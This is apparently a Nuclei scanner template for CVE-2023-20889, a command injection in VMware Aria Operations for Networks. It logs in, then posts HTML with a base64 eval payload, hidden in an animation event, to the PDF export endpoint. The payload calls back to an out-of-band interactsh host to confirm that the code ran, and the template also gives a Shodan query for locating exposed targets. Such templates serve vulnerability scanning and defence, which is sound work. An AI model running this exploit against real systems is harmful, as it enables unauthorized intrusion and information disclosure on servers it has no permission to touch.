91 lines
2.9 KiB
YAML
91 lines
2.9 KiB
YAML
id: CVE-2023-20889
|
|
|
|
info:
|
|
name: VMware Aria Operations for Networks - Code Injection Information Disclosure Vulnerability
|
|
author: iamnoooob,rootxharsh,pdresearch
|
|
severity: high
|
|
description: |
|
|
Aria Operations for Networks contains an information disclosure vulnerability. A malicious actor with network access to VMware Aria Operations for Networks may be able to perform a command injection attack resulting in information disclosure.
|
|
remediation: |
|
|
Apply the latest security patches provided by VMware to mitigate this vulnerability.
|
|
reference:
|
|
- https://www.zerodayinitiative.com/advisories/ZDI-23-842/
|
|
- https://www.vmware.com/security/advisories/VMSA-2023-0012.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-20889
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2023-20889
|
|
cwe-id: CWE-77
|
|
epss-score: 0.01964
|
|
epss-percentile: 0.87426
|
|
cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: vmware
|
|
product: vrealize_network_insight
|
|
shodan-query: title:"VMware Aria Operations"
|
|
tags: cve,cve2023,vmware,aria,disclosure,authenticated,rce,oast,intrusive
|
|
variables:
|
|
payload: location='http://{{interactsh-url}}'
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /api/auth/login HTTP/2
|
|
Host: {{Hostname}}
|
|
Content-Type: application/json;charset=UTF-8
|
|
X-Vrni-Csrf-Token: null
|
|
|
|
{"username":"{{username}}","password":"{{password}}","domain":"localdomain"}
|
|
- |
|
|
POST /api/pdfexport HTTP/2
|
|
Host: {{Hostname}}
|
|
X-Vrni-Csrf-Token: {{csrf}}
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFkpSYDWZ5w9YNjmh
|
|
|
|
------WebKitFormBoundaryFkpSYDWZ5w9YNjmh
|
|
Content-Disposition: form-data; name="{{randstr}}"
|
|
|
|
<!DOCTYPE HTML>
|
|
<html>
|
|
<head>
|
|
<title>Test</title>
|
|
</head>
|
|
<body>
|
|
<p data-vrni='vRealize'><style>@keyframes x{}</style><xss style="animation-name:x" onwebkitanimationstart="eval(atob('{{base64(payload)}}'))"></xss></p>
|
|
</body>
|
|
</html>
|
|
------WebKitFormBoundaryFkpSYDWZ5w9YNjmh--
|
|
|
|
cookie-reuse: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- dns
|
|
- http
|
|
|
|
- type: word
|
|
part: header_2
|
|
words:
|
|
- application/octet-stream
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: csrf
|
|
group: 1
|
|
regex:
|
|
- csrfToken":"([a-z0-9A-Z/+=]+)"
|
|
internal: true
|
|
part: body
|
|
|
|
# digest: 490a0046304402200f37cf2171987ea24f1c2e17751a0f93cf2f205333604166bc15756223a122e002202d819fe09019fdc3f297b5942126cc448bf0f4b535b322c276ab975479446588:922c64590222798bb761d5b6d8e72950
|